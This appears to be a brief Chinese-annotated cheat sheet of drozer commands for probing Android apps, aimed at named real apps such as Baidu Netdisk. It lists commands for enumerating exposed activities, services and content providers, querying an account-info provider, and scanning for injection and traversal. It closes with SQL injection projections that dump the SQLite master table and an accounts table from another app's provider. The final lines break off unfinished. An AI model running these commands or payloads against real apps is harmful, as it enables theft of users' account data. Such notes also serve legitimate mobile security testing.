adb forward tcp:31415 tcp:31415
drozer console connect
run app.package.list -f baidu 查看包名
run app.package.info -a com.baidu.netdisk 查看包信息
run app.package.attacksurface com.baidu.netdisk 查看那些信息(包括activity、brodcast、content providers、services)被暴露
run app.activity.info -a com.baidu.netdisk 查看有那些activity被暴露
run app.activity.start --component com.baidu.netdisk com.baidu.netdisk.ui.Navigate 启动某个组件
run scanner.provider.finduris -a com.baidu.netdisk 扫描provider暴露的URI
run app.provider.query ontent://com.baidu.pcs.sso.providers.acoountprovider/accountInfo --vertical 获取信息
run scanner.provider.injection -a com.baidu.netdisk 扫描可以被注入的provider
run scanner.provider.traversal -a com.baidu.netdisk 扫描可以被遍历的provider
run app.service.info -a com.baidu.netdisk 被暴露的service
run app.provider.query content://com.vodone.caibo.sqlite.provider/accounts/ --projection "* FROM SQLITE_MASTER WHERE type='table';--" 获取数据表
--projection "* FROM accounts;--" (接上条)获取表accounts的内容
出现java错误时,在
示例:
示例: